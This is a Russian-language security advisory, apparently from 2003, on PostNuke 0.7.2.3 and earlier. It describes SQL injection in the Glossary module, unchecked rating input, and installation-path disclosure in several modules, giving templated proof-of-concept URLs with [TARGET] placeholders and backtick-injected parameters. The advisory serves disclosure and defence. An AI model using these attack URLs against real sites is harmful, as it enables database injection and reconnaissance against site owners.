SQL инъекция и раскрытие информации в нескольких модулях в PostNuke

Дата публикации:
30.05.2003
Всего просмотров:
1167
Опасность:
Наличие исправления:
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Описание: Несколько уязвимостей обнаружено в PostNuke. Удаленный пользователь может выполнить DoS нападение против связанной базы данных и внедрить произвольные SQL команды. Также удаленный пользователь может определить инсталляционный путь.

Сообщается, что модуль Glossary не фильтрует данные, представленные пользователем в переменной 'page'. В результате удаленный пользователь может сконструировать URL, который выполнит произвольные SQL команды на основной базе данных. Пример:

http://[TARGET]/modules.php?op=modload&name=Glossary&file=index&
page=`[HERE COMES YOUR RANDOM DATA OR SQL QUERY]
Также сообщается, что системе рейтинга не проверяет значения рейтинга, представленные пользователем. Удаленный пользователь может представить случайные символы в поле рейтинга, чтобы вызвать ошибку на связанной базе данных. Пример:
http://[TARGET]/modules.php?op=modload&name=Downloads&file=index&req=a
ddrating&ratinglid=[DOWNLOADID]
&ratinguser=[REMOTE USER]&ratinghost_name=[REMOTE HOST;-)]
&rating=[YOUR RANDOM CONTENT]
Также сообщается, что модули 'Downloads' и 'WebLinks' раскрывают инсталляционный путь удаленному пользователю. Пример:
http://[TARGET]/modules.php?op=modload&name=Downloads&file=index&req=viewdownloaddetails&
lid=[RANDOM NUMERIC CONTENT]

http://[TARGET]/modules.php?op=modload&name=Downloads&file=index&req=viewdownloadcomments&
lid=[RANDOM NUMERIC CONTENT]

http://[TARGET]/modules.php?op=modload&name=Downloads&file=index&req=viewdownloadeditorial&
lid=[RANDOM NUMERIC CONTENT]

http://[TARGET]/modules.php?op=mod load&name=Downloads&file=index
&req=brokendownload&lid=[RANDOM NUMERIC CONTENT]

http://[TARGET]/modules.php?op=modload&name=Downloads&file=index&req=outsidedownloadsetup
&lid=[RANDOM NUMERIC CONTENT]
Модуль 'Sections' также раскрывает инсталляционный путь удаленному пользователю. Пример:
 

http://[TARGET]/modules.php?op=modload&name=Sections&file=index&req=listarticles&secid=[BLANK]

http://[TARGET]/modules.php?op=modload&nam e=Sections&file=index&req=listarticles&secid=[RANDOM CONTENT]

http://[TARGET]/modules.php?op=modload&name=Sections&file=index&req=viewarticle&artid=[BLANK]

http://[ TARGET]/modules.php?op=modload&name=Sections&file=index&req=viewarticle&artid=[RANDOM CONTENT]
Модуль 'FAQ' также раскрывает инсталляционный путь удаленному пользователю. Пример:

http://[TARGET]/modules.php?op=modload&name=FAQ
&file=index&myfaq=yes&id_cat=`[RANDOM CHARACTERS]
Секция 'Reviews' также раскрывает инсталляционный путь удаленному пользователю. Пример:
 
http://[TARGET]/modules.php?op=modload&name=Reviews
&file=index&req=showcontent&id=`[RANDOM] 
Уязвимость обнаружена в PostNuke 0.7.2.3 and prior versions (0.7.x.x)

Ссылки: PostNuke Main Modules SQL Injections , DoS and Path Disclosures
или введите имя

CAPTCHA